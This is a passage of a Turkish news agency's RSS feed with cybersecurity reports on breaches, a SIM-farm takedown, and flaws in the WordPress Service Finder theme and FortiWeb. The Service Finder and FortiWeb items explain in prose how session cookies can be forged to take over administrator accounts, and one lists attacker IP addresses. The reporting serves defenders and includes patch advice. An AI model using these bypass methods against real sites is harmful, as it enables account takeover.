<p><a href="https://beykozunsesi.com.tr/guney-kore-devlet-veri-merkezi-yangini-858-tb-kalici-veri-kaybi-709-kamu-sistemi-etkilendi" target="_blank" rel="noopener">Güney Kore Devlet Veri Merkezi Yangını: 858 TB kalıcı veri kaybı, 709 kamu sistemi etkilendi</a></p>
<p data-start="3039" data-end="3220"></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>WordPress "Service Finder" temasında kritik güvenlik açığı: Saldırganlar yönetici hesaplarını ele geçirebiliyor</title>
            <link>https://cumha.com.tr/wordpress-service-finder-temasinda-kritik-guvenlik-acigi-saldirganlar-yoenetici-hesaplarini-ele-gecirebiliyor</link>
            <guid>https://cumha.com.tr/wordpress-service-finder-temasinda-kritik-guvenlik-acigi-saldirganlar-yoenetici-hesaplarini-ele-gecirebiliyor</guid>
            <description><![CDATA[ WordPress tabanlı sitelerde kullanılan &quot;Service Finder&quot; temasının rezervasyon modülünde tespit edilen kritik bir güvenlik açığı, saldırganların kimlik doğrulaması olmadan yönetici hesaplarına erişim sağlamasına neden oluyor. CVE-2025-5947 koduyla kaydedilen açık, 9.8 CVSS puanına sahip ve tüm sürümleri 6.0’a kadar etkiliyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202510/image_870x_68e8c95c6fb42.webp" length="23272" type="image/webp"/>
            
            <pubDate>Fri, 10 Oct 2025 11:51:39 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Service Finder temasında tespit edilen açık hangi sürümleri etkiliyor, saldırganlar bu zafiyetten nasıl yararlanıyor, hangi IP adreslerinden saldırı girişimleri tespit edildi, kullanıcılar sistemlerini korumak için hangi adımları atmalı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="494" data-end="497">WordPress teması “Service Finder” içinde yer alan rezervasyon modülünde kritik bir güvenlik zafiyeti tespit edildi. CVE-2025-5947 olarak tanımlanan açık, 9.8 CVSS puanıyla “kritik” düzeyde değerlendiriliyor. Açığın, kimliği doğrulanmamış kullanıcıların yönetici hesapları da dahil olmak üzere herhangi bir kullanıcı hesabına erişim elde etmesine olanak tanıdığı bildirildi.</p>
<p></p>
<p data-start="874" data-end="1216">Uzmanlara göre, zafiyet “service_finder_switch_back()” adlı fonksiyonun hatalı çalışmasından kaynaklanıyor. Bu fonksiyon, kullanıcı geçişlerinde “original_user_id” adlı çerezi kullanıyor ancak bu çerezde kimlik doğrulama kontrolü bulunmuyor. Saldırganlar bu çerezi manipüle ederek yönetici yetkilerine sahip hesaplara erişim sağlayabiliyor.</p>
<p data-start="1218" data-end="1446">Siber güvenlik araştırmacıları, söz konusu açığın kötü niyetli kişilere içerik değiştirme, şifre güncelleme, zararlı kod ekleme veya siteyi oltalama ve kötü amaçlı yazılım kampanyalarında kullanma imkânı tanıdığını belirtiyor.</p>
<p data-start="1448" data-end="1810"><strong data-start="1448" data-end="1473">Etki Alanı ve Riskler</strong><br data-start="1473" data-end="1476">Açık, “Service Finder” temasının 6.0 sürümüne kadar olan tüm versiyonlarını etkiliyor. Tema güncel değilse, sistem üzerinde hiçbir eklenti olmasa bile site savunmasız durumda olabiliyor. Etkilenen sistemlerde izinsiz girişler, yeni kullanıcı hesaplarının oluşturulması ve yönetici panosunda olağandışı aktiviteler gözlemlenebiliyor.</p>
<p data-start="1812" data-end="2076">Güvenlik raporlarına göre, saldırı girişimlerinde 5.189.221.98, 185.109.21.157, 192.121.16.196, 194.68.32.71 ve 178.125.204.198 IP adreslerinden gelen istekler tespit edildi. Ancak bu adreslerin kayıtlarında bulunmaması sistemin güvenli olduğu anlamına gelmiyor.</p>
<p data-start="2078" data-end="2430"><strong data-start="2078" data-end="2107">Alınması Gereken Önlemler</strong><br data-start="2107" data-end="2110">Uzmanlar, temanın 6.0 sonrası sürümüne geçilmesini, tüm kullanıcı hesaplarının ve yetkilerinin gözden geçirilmesini, güvenlik duvarı (WAF) veya Wordfence gibi eklentilerin aktif hale getirilmesini öneriyor. Ayrıca site trafiği ve çerez davranışlarının özellikle yönetici oturumlarında izlenmesi gerektiği vurgulanıyor.</p>
<p data-start="2432" data-end="2575">Sistemin yedekten geri yüklenmesi planlanıyorsa, kullanılan yedeklerin temiz ve güvenilir bir kaynaktan alındığından emin olunması gerekiyor.</p>
<p data-start="2577" data-end="2832"><strong data-start="2577" data-end="2589"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>ABD Gizli Servisi BM Genel Kurulu çevresinde 100 bin SIM kartlık gizli iletişim ağını çökertti</title>
            <link>https://cumha.com.tr/abd-gizli-servisi-bm-genel-kurulu-cevresinde-100-bin-sim-kartlik-gizli-iletisim-agini-coekertti</link>
            <guid>https://cumha.com.tr/abd-gizli-servisi-bm-genel-kurulu-cevresinde-100-bin-sim-kartlik-gizli-iletisim-agini-coekertti</guid>
            <description><![CDATA[ ABD Gizli Servisi, New York’ta Birleşmiş Milletler Genel Kurulu sırasında dünya liderlerini hedef alabilecek kapasitede bir telekomünikasyon ağına yönelik operasyon düzenledi. 100 binin üzerinde SIM kart ve 300’den fazla cihaz ele geçirildi. Sistemin 911 acil hatlarını çökertme, baz istasyonlarını devre dışı bırakma ve izlenemeyen iletişim sağlama kapasitesi olduğu bildirildi. Failin kimliği henüz netleşmedi, adli inceleme sürüyor. ]]></description>

                            <enclosure url="https://beykozunsesi.com.tr/uploads/images/202509/image_870x_68d31c7984308.webp" length="49398" type="image/webp"/>
            
            <pubDate>Wed, 24 Sep 2025 11:21:55 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords></media:keywords>

                            <content:encoded>
                                            <![CDATA[<p data-start="590" data-end="899">ABD Gizli Servisi, New York’ta Birleşmiş Milletler (BM) Genel Kurulu’nun güvenliği için kritik bir operasyon gerçekleştirdi. Açıklamaya göre 100.000’den fazla SIM kart ve 300’den fazla SIM sunucusu ele geçirildi. New York genelinde 35 millik bir alanı kapsayan gizli telekomünikasyon ağı tamamen çökertildi.</p>
<p><img src="https://beykozunsesi.com.tr/uploads/images/202509/image_870x_68d31c8ba1386.webp" alt=""></p>
<p data-start="901" data-end="1292"><strong data-start="901" data-end="922">Tehdit Kapasitesi</strong><br data-start="922" data-end="925">Yetkililer, ele geçirilen sistemin dakikada 30 milyon SMS gönderebilecek büyüklükte olduğunu açıkladı. Ağın baz istasyonlarını devre dışı bırakma, 911 acil yardım hattına DDoS saldırısı düzenleme ve şifreli iletişim sağlama gibi işlevlere sahip olduğu belirtildi. Bu kapasitenin kamu güvenliğini ve diplomatik faaliyetleri doğrudan tehlikeye atabileceği vurgulandı.</p>
<p><img src="https://beykozunsesi.com.tr/uploads/images/202509/image_870x_68d31c8d2a116.webp" alt=""></p>
<p data-start="1294" data-end="1530"><strong data-start="1294" data-end="1335">BM Genel Kurulu Çevresinde Yoğunlaşma</strong><br data-start="1335" data-end="1338">Operasyonda tespit edilen cihazların büyük kısmı BM Genel Kurulu’nun yapıldığı bölge çevresinde bulundu. Bu durum, ağın uluslararası diplomatik etkinliği hedef aldığı ihtimalini güçlendirdi.</p>
<p><img src="https://beykozunsesi.com.tr/uploads/images/202509/image_870x_68d31c8eb4c9a.webp" alt=""></p>
<p data-start="1532" data-end="1868"><strong data-start="1532" data-end="1575">Ulus-Devlet ve Suç Örgütleri Bağlantısı</strong><br data-start="1575" data-end="1578">ABD’li yetkililer, adli incelemenin sürdüğünü ve ilk bulguların ulus-devlet destekli tehdit aktörleri ile organize suç grupları arasında bağlantıya işaret ettiğini duyurdu. Uzmanlara göre bu tür bir ağ casusluk, kritik altyapılara saldırı planlama ve gizli iletişim için kullanılabiliyor.</p>
<p><img src="https://beykozunsesi.com.tr/uploads/images/202509/image_870x_68d31c9026abe.webp" alt=""></p>
<p data-start="1870" data-end="2144"><strong data-start="1870" data-end="1901">Fail Belirsizliğini Koruyor</strong><br data-start="1901" data-end="1904">Operasyon sonrası bazı çevrelerde Rusya, Çin ve İsrail’in adı geçse de, ABD yetkilileri herhangi bir ülkeyi resmi olarak işaret etmedi. Gizli Servis sözcüsü, “Henüz belirli bir devlet ya da örgütü suçlayacak delil yok” ifadesini kullandı.</p>
<p><img src="https://beykozunsesi.com.tr/uploads/images/202509/image_870x_68d31c916f982.webp" alt=""></p>
<p data-start="2146" data-end="2376"><strong data-start="2146" data-end="2180">ABD’nin Çok Katmanlı Önlemleri</strong><br data-start="2180" data-end="2183">Operasyona Gizli Servis’in yanı sıra FBI, İç Güvenlik Bakanlığı (DHS) ve New York polisinin de katıldığı bildirildi. BM Genel Kurulu boyunca şehirde üst düzey güvenlik protokolleri uygulandı.</p>
<p><img src="https://beykozunsesi.com.tr/uploads/images/202509/image_870x_68d31c92787fb.webp" alt=""></p>
<p data-start="2378" data-end="2673"><strong data-start="2378" data-end="2408">Adli İnceleme Devam Ediyor</strong><br data-start="2408" data-end="2411">Ele geçirilen cihazlar üzerinde yapılan incelemeler, sistemin hangi ülke ya da örgütlerle bağlantılı olduğunu ve planlanan olası saldırıların boyutunu ortaya koyacak. Yetkililer, “Tehdit tam olarak ortadan kalkmış değil, soruşturma sürüyor” uyarısında bulundu.</p>
<p data-start="2378" data-end="2673"><a href="https://beykozunsesi.com.tr/abd-gizli-servisi-bm-genel-kurulu-cevresinde-100-bin-sim-kartlik-gizli-iletisim-agini-coekertti" target="_blank" rel="noopener">ABD Gizli Servisi BM Genel Kurulu çevresinde 100 bin SIM kartlık gizli iletişim ağını çökertti</a></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Plex’te veri ihlali: E-postalar ve şifreler sızdırıldı, kullanıcılar parola değiştirmeye çağrıldı!</title>
            <link>https://cumha.com.tr/plexte-veri-ihlali-e-postalar-ve-sifreler-sizdirildi-kullanicilar-parola-degistirmeye-cagrildi</link>
            <guid>https://cumha.com.tr/plexte-veri-ihlali-e-postalar-ve-sifreler-sizdirildi-kullanicilar-parola-degistirmeye-cagrildi</guid>
            <description><![CDATA[ Dünya genelinde milyonlarca kişinin kullandığı medya akış platformu Plex, yetkisiz kişilerin kullanıcı verilerine eriştiğini açıkladı. Şirket, e-posta, kullanıcı adı ve şifrelenmiş parolaların ele geçirildiğini belirterek tüm kullanıcıları şifrelerini yenilemeye ve güvenlik önlemlerini artırmaya davet etti. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202509/image_870x_68c1d77d3615e.webp" length="4340" type="image/webp"/>
            
            <pubDate>Wed, 10 Sep 2025 22:54:48 +0300</pubDate>
            <dc:creator>Fatih Can Cengiz</dc:creator>
            <media:keywords>Plex, veri güvenliği, Plex veri ihlalinde hangi bilgiler ele geçirildi, kullanıcıların alması gereken güvenlik önlemleri neler, Plex şifrelerin korunması için hangi yöntemleri kullandı, iki faktörlü kimlik doğrulama neden öneriliyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p data-start="444" data-end="679" style="text-align: justify;">Medya akış platformu Plex, yetkisiz kişilerin kullanıcı verilerine eriştiğini duyurdu. Şirket, olayın ardından güvenlik ekibinin hızlı şekilde harekete geçtiğini ve sistemlerin kontrol altına alındığını bildirdi.</p>
<p data-start="681" data-end="991" style="text-align: justify;">Plex’in web sitesinde yapılan açıklamada, bir üçüncü tarafın veritabanındaki sınırlı sayıda kullanıcı verisine eriştiği ifade edildi. Ele geçirilen veriler arasında kullanıcıların e-posta adresleri, kullanıcı adları, güvenli şekilde şifrelenmiş parolaları ve kimlik doğrulama verilerinin bulunduğu aktarıldı.</p>
<p data-start="993" data-end="1255" style="text-align: justify;"><strong data-start="993" data-end="1016">Kullanıcılara çağrı</strong><br data-start="1016" data-end="1019">Şirket, tüm kullanıcılara parolalarını derhal değiştirmeleri yönünde uyarıda bulundu. Ayrıca güvenliğin artırılması için bağlı tüm cihazlardan çıkış yapılması ve iki faktörlü kimlik doğrulamanın etkinleştirilmesi gerektiği vurgulandı.</p>
<p data-start="1257" data-end="1535" style="text-align: justify;"><strong data-start="1257" data-end="1291">Veri güvenliği soru işaretleri</strong><br data-start="1291" data-end="1294">Plex, kullanıcı parolalarının güçlü şifreleme yöntemleriyle korunduğunu, ancak ihtiyati tedbir olarak tüm hesapların güncellenmesi gerektiğini açıkladı. Olayın ardından platformun güvenlik süreçlerini gözden geçirmeye başladığı bildirildi.</p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>BTK: "E-imza veri havuzu sızıntısı iddiaları asılsız, sorumlular hakkında suç duyurusunda bulunuldu"</title>
            <link>https://cumha.com.tr/btk-e-imza-veri-havuzu-sizintisi-iddialari-asilsiz-sorumlular-hakkinda-suc-duyurusunda-bulunuldu</link>
            <guid>https://cumha.com.tr/btk-e-imza-veri-havuzu-sizintisi-iddialari-asilsiz-sorumlular-hakkinda-suc-duyurusunda-bulunuldu</guid>
            <description><![CDATA[ Bilgi Teknolojileri ve İletişim Kurumu (BTK), bazı medya organlarında yer alan e-imza veri sızıntısı iddialarını kesin bir dille yalanladı. Kurum, Türkiye’deki e-imzaların güvenli şekilde yalnızca sahiplerinin cihazlarında bulunduğunu vurguladı ve kamuoyunu yanıltıcı haberler yayan kişiler hakkında suç duyurusunda bulunulduğunu açıkladı. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202509/image_870x_68ba9cd0a0604.webp" length="67290" type="image/webp"/>
            
            <pubDate>Fri, 05 Sep 2025 11:22:52 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>BTK e-imza sızıntısı iddialarına nasıl yanıt verdi, e-imza verileri nerede saklanıyor, 7545 sayılı yasa hangi cezaları öngörüyor, asılsız iddialar hakkında hangi yasal süreç başlatıldı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p>Bilgi Teknolojileri ve İletişim Kurumu (BTK), elektronik imza veri havuzunun hacklendiğine dair basında yer alan iddialar üzerine açıklama yaptı.</p>
<p data-start="648" data-end="879">Kurum, Türkiye’de kullanılan tüm e-imzaların yalnızca BTK tarafından yetkilendirilen 8 Elektronik Sertifika Hizmet Sağlayıcı (ESHS) tarafından üretildiğini ve 5070 Sayılı Elektronik İmza Kanunu kapsamında denetlendiğini bildirdi.</p>
<p data-start="881" data-end="1256"><strong data-start="881" data-end="914">"Veri havuzu bulunmamaktadır"</strong><br data-start="914" data-end="917">BTK, e-imza sisteminde kişisel verilerin kurum bünyesinde tutulmadığını, nitelikli elektronik sertifikaların yalnızca kullanıcıların USB cihazlarında bulunduğunu belirtti. Açıklamada, "Türkiye’de bulunan tüm e-imzalara ait bilgiler, BTK ya da e-Devlet kapısı dahil, toplu halde herhangi bir veri havuzunda barındırılmamaktadır." denildi.</p>
<p data-start="1258" data-end="1635"><strong data-start="1258" data-end="1300">Yanıltıcı bilgiye hapis cezası uyarısı</strong><br data-start="1300" data-end="1303">Kurum, siber güvenlik alanında yanıltıcı bilgi yaymanın panik ve endişe oluşturabileceğini hatırlatarak, bu tür eylemlerin 7545 sayılı Siber Güvenlik Kanunu kapsamında suç teşkil ettiğini duyurdu. Kanunun 16. maddesine göre gerçeğe aykırı siber saldırı veya veri sızıntısı iddiaları yayanlara 2 ila 5 yıl hapis cezası öngörülüyor.</p>
<p data-start="1637" data-end="1825"><strong data-start="1637" data-end="1663">Yasal süreç başlatıldı</strong><br data-start="1663" data-end="1666">BTK, yaklaşık 2 milyon 500 bin e-imza kullanıcısını hedef alan asılsız paylaşımlar nedeniyle sorumlu kişiler hakkında suç duyurusunda bulunulduğunu açıkladı.</p>
<p data-start="1827" data-end="2030"><a href="https://beykozunsesi.com.tr/btk-e-imza-veri-havuzu-sizintisi-iddialari-asilsiz-sorumlular-hakkinda-suc-duyurusunda-bulunuldu">BTK: "E-imza veri havuzu sızıntısı iddiaları asılsız, sorumlular hakkında suç duyurusunda bulunuldu"</a><strong data-start="1827" data-end="1839"></strong></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Türk Tabipler Birliği’ne siber saldırı: 107 bin kişinin verileri risk altında</title>
            <link>https://cumha.com.tr/turk-tabipler-birligine-siber-saldiri-107-bin-kisinin-verileri-risk-altinda</link>
            <guid>https://cumha.com.tr/turk-tabipler-birligine-siber-saldiri-107-bin-kisinin-verileri-risk-altinda</guid>
            <description><![CDATA[ Türk Tabipler Birliği, 8 Ağustos 2025’te gerçekleştirilen siber saldırı sonucu çalışanlar, kullanıcılar ve tabip odalarına kayıtlı üyelerin kişisel verilerinin etkilendiğini duyurdu. Kimlik, iletişim, lokasyon ve işlem güvenliği verilerinin erişildiği ve silindiği belirtildi. Kişisel Verileri Koruma Kurulu, ihlalin 14 Ağustos 2025 tarihli kararla kamuoyuna ilan edilmesine karar verdi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a647ca2f472.webp" length="66404" type="image/webp"/>
            
            <pubDate>Thu, 21 Aug 2025 01:10:30 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Türk Tabipler Birliği veri ihlali nasıl gerçekleşti, hangi veriler siber saldırıda ele geçirildi, kaç kişinin bilgileri risk altında, KVKK bu olayla ilgili nasıl bir karar aldı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="521" data-end="524">Türk Tabipler Birliği (TTB), 8 Ağustos 2025 tarihinde sistemlerine yönelik siber saldırı gerçekleştiğini açıkladı. Kuruma yapılan bildirime göre saldırının nasıl gerçekleştirildiği henüz tespit edilemedi.</p>
<p></p>
<p data-start="732" data-end="954">Veri ihlali sonucunda TTB sisteminde yer alan kayıtlı dosyalara erişildiği ve bu dosyaların silindiği ifade edildi. İhlalden etkilenen gruplar arasında çalışanlar, kullanıcılar ve tabip odalarına kayıtlı üyeler yer aldı.</p>
<p data-start="956" data-end="1252"><strong data-start="956" data-end="983">Hangi veriler etkilendi</strong><br data-start="983" data-end="986">Yapılan açıklamada, kimlik, iletişim, lokasyon, hukuki işlem ve işlem güvenliği verilerinin saldırıdan etkilendiği belirtildi. Üye veri tabanına erişim sağlanamadığı için kesin sayı belirlenemese de yaklaşık 107 bin kişinin bu ihlalden etkilenebileceği bildirildi.</p>
<p data-start="1254" data-end="1491"><strong data-start="1254" data-end="1269">KVKK kararı</strong><br data-start="1269" data-end="1272">Kişisel Verileri Koruma Kurulu (KVKK), 14 Ağustos 2025 tarihli ve 2025/1514 sayılı kararıyla söz konusu veri ihlalinin kurumun internet sitesinde ilan edilmesine karar verdi. Kurulun incelemelerinin sürdüğü aktarıldı.</p>
<p data-start="1493" data-end="1688"><strong data-start="1493" data-end="1505"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Colt Telecom saldırısını WarLock fidye yazılım grubu üstlendi, çalınan veriler satışa çıkarıldı</title>
            <link>https://cumha.com.tr/colt-telecom-saldirisini-warlock-fidye-yazilim-grubu-ustlendi-calinan-veriler-satisa-cikarildi</link>
            <guid>https://cumha.com.tr/colt-telecom-saldirisini-warlock-fidye-yazilim-grubu-ustlendi-calinan-veriler-satisa-cikarildi</guid>
            <description><![CDATA[ İngiltere merkezli Colt Technology Services, 12 Ağustos’ta başlayan siber saldırı nedeniyle Colt Online ve Voice API dahil bazı hizmetlerinde günlerdir kesinti yaşıyor. WarLock grubu saldırıyı üstlenerek finansal, müşteri ve çalışan bilgilerini içeren 1 milyon belgeyi 200 bin dolara satışa çıkardı. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a59bdf0723e.webp" length="51298" type="image/webp"/>
            
            <pubDate>Wed, 20 Aug 2025 13:01:13 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords></media:keywords>

                            <content:encoded>
                                            <![CDATA[<p data-start="455" data-end="699">İngiltere merkezli telekomünikasyon şirketi Colt Technology Services, 12 Ağustos’ta başlayan bir siber saldırının etkilerini gidermeye çalışıyor. Şirket, olayın ardından bazı sistemlerini koruma amacıyla çevrimdışı aldı ve kesintiler sürüyor.</p>
<p data-start="701" data-end="1079"><strong data-start="701" data-end="724">Hizmetlerde kesinti</strong><br data-start="724" data-end="727">Colt’un açıklamasına göre kesintiler; Colt Online, Voice API platformu ve barındırma/numara taşıma hizmetlerini etkiliyor. Müşteri iletişimi çevrimiçi portallar üzerinden sağlanamıyor, yalnızca e-posta ve telefon ile destek veriliyor. Şirket, etkilenen sistemlerin destek hizmetleri olduğunu, temel müşteri ağ altyapısının zarar görmediğini belirtti.</p>
<p data-start="1081" data-end="1498"><strong data-start="1081" data-end="1103">WarLock’un iddiası</strong><br data-start="1103" data-end="1106">‘cnkjasdfgd’ takma adlı bir tehdit aktörü, WarLock fidye yazılım grubu adına saldırıyı üstlendi. Aktör, Colt’tan çalındığını iddia ettiği bir milyon belgeyi 200.000 dolara satışa sundu ve bazı örnek dosyaları yayımladı. İddialara göre dosyalar; finansal veriler, çalışan ve müşteri bilgileri, üst düzey yöneticilere ait veriler, dahili e-postalar ve yazılım geliştirme belgelerini içeriyor.</p>
<p data-start="1500" data-end="1844"><strong data-start="1500" data-end="1524">Olası güvenlik açığı</strong><br data-start="1524" data-end="1527">Siber güvenlik araştırmacısı Kevin Beaumont, saldırganların Microsoft SharePoint’te bulunan ve CVE-2025-53770 olarak izlenen kritik uzaktan kod yürütme açığını kullanmış olabileceğini belirtti. Bu açık en az 18 Temmuz’dan itibaren sıfır gün olarak istismar edilmiş ve Microsoft tarafından 21 Temmuz’da yamalanmıştı.</p>
<p data-start="1846" data-end="1956">Beaumont’a göre saldırganlar yüzlerce gigabaytlık müşteri verisi ve iç dokümanı sistemlerden dışarı çıkardı.</p>
<p data-start="1958" data-end="2237"><strong data-start="1958" data-end="1980">Colt’un açıklaması</strong><br data-start="1980" data-end="1983">Şirket sözcüsü, BleepingComputer’a yaptığı açıklamada, “Siber olayla ilgili iddiaların farkındayız, incelemelerimiz sürüyor. Teknik ekibimiz, üçüncü taraf uzmanlarla birlikte etkilenen sistemleri geri yüklemeye odaklanmış durumda” ifadelerini kullandı.</p>
<p data-start="2239" data-end="2479"><strong data-start="2239" data-end="2251"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>FortiWeb güvenlik açığı tam yetki atlatmaya izin veriyor, araştırmacı istismar kodunu yayımlamaya hazırlanıyor</title>
            <link>https://cumha.com.tr/fortiweb-guvenlik-acigi-tam-yetki-atlatmaya-izin-veriyor-arastirmaci-istismar-kodunu-yayimlamaya-hazirlaniyor</link>
            <guid>https://cumha.com.tr/fortiweb-guvenlik-acigi-tam-yetki-atlatmaya-izin-veriyor-arastirmaci-istismar-kodunu-yayimlamaya-hazirlaniyor</guid>
            <description><![CDATA[ Fortinet’in web uygulama güvenlik duvarı FortiWeb’de keşfedilen ve CVE-2025-52970 olarak takip edilen kritik açık, saldırganların kimlik doğrulamayı tamamen atlatmasına olanak tanıyor. Araştırmacı Aviv Y, kısmi PoC yayımlarken tam istismar kodunu sistem yöneticilerine güncelleme için süre tanımak amacıyla erteledi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a59bd2760cd.webp" length="52150" type="image/webp"/>
            
            <pubDate>Wed, 20 Aug 2025 13:01:11 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords></media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="487" data-end="731">Fortinet’in FortiWeb ürününde bulunan kritik bir güvenlik açığı, saldırganların herhangi bir kullanıcıyı, hatta yöneticileri taklit etmesine imkân tanıyor. CVE-2025-52970 olarak izlenen açık, 12 Ağustos’ta yayımlanan güncelleme ile kapatıldı.</p>
<p data-start="733" data-end="1128"><strong data-start="733" data-end="762">Açığın teknik ayrıntıları</strong><br data-start="762" data-end="765">Araştırmacı Aviv Y tarafından “FortMajeure” adı verilen açık, FortiWeb’in çerez ayrıştırmasındaki “out-of-bounds read” hatasından kaynaklanıyor. Saldırgan, <em data-start="921" data-end="926">Era</em> parametresine beklenmedik bir değer atayarak sunucunun tüm sıfırlardan oluşan gizli anahtarı kullanmasına neden oluyor. Bu durum, sahte kimlik doğrulama çerezlerinin kolayca oluşturulmasını sağlıyor.</p>
<p data-start="1130" data-end="1423">Açığın başarılı şekilde istismar edilmesi için hedef kullanıcının aktif oturum açmış olması gerekiyor. Ardından saldırgan, çerezdeki küçük bir sayısal alanı brute-force yöntemiyle tahmin etmek zorunda. Ancak bu alanın değer aralığının 30’dan küçük olması, saldırıyı pratikte kolaylaştırıyor.</p>
<p data-start="1425" data-end="1559"><strong data-start="1425" data-end="1458">Etkilenen sürümler ve yamalar</strong><br data-start="1458" data-end="1461">Açık, FortiWeb’in 7.0 ile 7.6 arasındaki sürümlerini etkiliyor. Güvenli sürümler ise şu şekilde:</p>
<ul data-start="1561" data-end="1674">
<li data-start="1561" data-end="1588">
<p data-start="1563" data-end="1588">FortiWeb 7.6.4 ve üzeri</p>
</li>
<li data-start="1589" data-end="1616">
<p data-start="1591" data-end="1616">FortiWeb 7.4.8 ve üzeri</p>
</li>
<li data-start="1617" data-end="1645">
<p data-start="1619" data-end="1645">FortiWeb 7.2.11 ve üzeri</p>
</li>
<li data-start="1646" data-end="1674">
<p data-start="1648" data-end="1674">FortiWeb 7.0.11 ve üzeri</p>
</li>
</ul>
<p data-start="1676" data-end="1812">FortiWeb 8.0 sürümleri bu açıktan etkilenmiyor. Fortinet, geçici çözüm bulunmadığını ve tek etkili adımın güncelleme olduğunu duyurdu.</p>
<p data-start="1814" data-end="2099"><strong data-start="1814" data-end="1839">Araştırmacının kararı</strong><br data-start="1839" data-end="1842">Aviv Y, açığın temelini gösteren bir PoC paylaştı, ancak REST endpoint üzerinden yönetici taklidi dışında tüm istismar zincirini yayımlamadı. Tam kodun daha sonra açıklanacağını, böylece sistem yöneticilerine yamaları uygulama süresi tanındığını belirtti.</p>
<p data-start="2101" data-end="2372">Araştırmacıya göre, eksik detaylar bilgili saldırganların bile tek başına tam bir istismar geliştirmesine imkân vermiyor. Ancak duyuruların ardından siber suçluların hızlıca harekete geçtiği düşünüldüğünde, FortiWeb kullanıcılarının derhal güncelleme yapması gerekiyor.</p>
<p data-start="2374" data-end="2562"><strong data-start="2374" data-end="2386"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>İK devi Workday, Salesforce tabanlı sosyal mühendislik saldırısıyla gerçekleşen veri ihlalini doğruladı</title>
            <link>https://cumha.com.tr/ik-devi-workday-salesforce-tabanli-sosyal-muhendislik-saldirisiyla-gerceklesen-veri-ihlalini-dogruladi</link>
            <guid>https://cumha.com.tr/ik-devi-workday-salesforce-tabanli-sosyal-muhendislik-saldirisiyla-gerceklesen-veri-ihlalini-dogruladi</guid>
            <description><![CDATA[ Dünya genelinde 11.000’den fazla kuruma hizmet veren insan kaynakları yazılım şirketi Workday, sosyal mühendislik saldırısı sonucu üçüncü taraf CRM sistemi üzerinden veri ihlaline uğradığını açıkladı. ShinyHunters grubuyla ilişkilendirilen saldırıda müşteri kiracı verilerine erişilmediği belirtilse de iletişim bilgileri açığa çıktı. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a59bb900035.webp" length="67556" type="image/webp"/>
            
            <pubDate>Wed, 20 Aug 2025 13:01:08 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords></media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="498" data-end="813">ABD’nin California eyaletinde merkezi bulunan Workday, üçüncü taraf müşteri ilişkileri yönetim (CRM) platformuna yönelik bir sosyal mühendislik saldırısında veri ihlali yaşandığını duyurdu. Şirket, olayda müşteri kiracı verilerine erişim sağlanmadığını ancak bazı iş iletişim bilgilerinin sızdırıldığını açıkladı.</p>
<p data-start="815" data-end="1207"><strong data-start="815" data-end="841">Saldırının ayrıntıları</strong><br data-start="841" data-end="844">Workday’in 16 Ağustos’ta yaptığı duyuruya göre saldırganlar, şirket çalışanlarını hedef alan sosyal mühendislik yöntemleriyle CRM platformuna erişim sağladı. Açığa çıkan veriler arasında ad, e-posta adresi ve telefon numaraları gibi bilgilerin bulunduğu belirtildi. Şirket, bu tür bilgilerin sonraki oltalama saldırılarında kullanılabileceği uyarısında bulundu.</p>
<p data-start="1209" data-end="1374">Olayın 6 Ağustos’ta tespit edildiği ve saldırganların kendilerini İK veya BT çalışanı gibi tanıtarak mesaj ve telefon yoluyla bilgi toplamaya çalıştığı bildirildi.</p>
<p data-start="1376" data-end="1784"><strong data-start="1376" data-end="1403">ShinyHunters bağlantısı</strong><br data-start="1403" data-end="1406">Olay, ShinyHunters grubuyla ilişkilendirilen küresel saldırı dalgasının bir parçası. Grup, yıl başından bu yana Salesforce tabanlı CRM sistemlerini hedef alarak kötü amaçlı OAuth uygulamaları üzerinden veritabanlarına erişiyor. Daha önce Adidas, Qantas, Allianz Life, Louis Vuitton, Dior, Tiffany &amp; Co., Chanel ve Google gibi büyük şirketler de benzer saldırılardan etkilendi.</p>
<p data-start="1786" data-end="1965">Çalınan veriler, e-posta yoluyla kurbanlardan fidye talep etmek amacıyla kullanılıyor. ShinyHunters, daha önce Snowflake, AT&amp;T ve PowerSchool saldırılarıyla da gündeme gelmişti.</p>
